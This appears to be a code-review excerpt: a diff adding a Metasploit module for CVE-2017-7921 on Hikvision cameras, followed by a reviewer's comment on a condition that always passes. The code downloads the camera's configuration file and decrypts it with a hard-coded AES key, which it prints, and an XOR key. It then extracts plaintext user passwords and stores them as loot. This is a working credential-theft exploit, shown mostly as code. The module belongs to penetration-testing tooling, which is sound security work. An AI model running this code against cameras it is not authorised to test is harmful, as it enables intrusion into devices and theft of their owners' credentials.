modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb

```diff
@@ -0,0 +1,338 @@
+
+    cred_res = create_credential_and_login(credential_data)
+    unless cred_res.nil?
+      print_status("Credentials for user:#{user} are added to the database...")
+    end
+  end
+
+  def decrypt_config
+    text_data = []
+
+    # Get AES128-ECB encrypted camera configuration file with user and password information
+    uri = normalize_uri(target_uri.path, 'System', 'configurationFile')
+    aes_data = get_info(uri)
+
+    if aes_data.nil?
+      print_error('Target server did not respond to the configuration file download request.')
+    elsif aes_data.code == 200
+      # decrypt configuration file data with the weak AES128-ECB encryption hex key: 279977f62f6cfd2d91cd75b889ce0c9a
+      decipher = OpenSSL::Cipher.new('aes-128-ecb')
+      decipher.decrypt
+      decipher.key = [AES_KEY].pack('H*') # transform hex key to 16 bits key
+      xor_data = decipher.update(aes_data.body) + decipher.final
+
+      # decode the AES decrypted configuration file data with xor key: 73 8B 55 44
+      file_data = Rex::Text.xor(XOR_KEY.b, xor_data)
+
+      # extract text chunks with regular expression below...
+      text_data = file_data.scan(%r{[0-9A-Za-z_\#~`@|\\/=*\^:"'.;{}?\-+&!$%()\[\]<>]+}x)
+    end
+    return text_data
+  end
+
+  def get_creds
+    loot_data = ''
+    pwd = nil
+
+    print_status('Getting the user credentials...')
+    uri = normalize_uri(target_uri.path, 'Security', 'users')
+    creds_info = get_info(uri)
+
+    if creds_info.nil?
+      print_error('Target server did not respond to the credentials request.')
+    elsif creds_info.code == 200
+      # process XML output and store output in loot_data
+      xml_creds_info = creds_info.get_xml_document
+      if xml_creds_info.blank?
+        print_error('No users were found in the returned CSS code!')
+      else
+        # Download camera configuration file and and decrypt
+        text_data = decrypt_config
+        loot_data << "User Credentials Information:\n"
+        loot_data << "-----------------------------\n"
+        xml_creds_info.css('User').each do |user|
+          unless text_data.empty?
+            # Filter out password based on user name and store credentials in the database
+            i = text_data.each_with_index.select { |text_chunk, _index| text_chunk == user.at_css('userName').content }.map { |pair| pair[1] }
+            if i.empty?
+              print_error("Could not retrieve password for user:#{user.at_css('userName').content} from the camera configuration file!")
+            else
+              pwd = text_data[i.last + 1]
+              report_creds(user.at_css('userName').content, pwd)
+            end
+          end
+          loot_data << "User:#{user.at_css('userName').content} | ID:#{user.at_css('id').content} | Role:#{user.at_css('userLevel').content} | Password: #{pwd}\n"
+        end
+      end
+    else
+      print_error('Response code invalid for obtaining the user credentials.')
+    end
+    if loot_data
```

Comment:
It looks like `loot_data` is set to an empty string at line 135 and this test will always pass. I believe the right condition would be:
```suggestion
    unless loot_data.empty?
```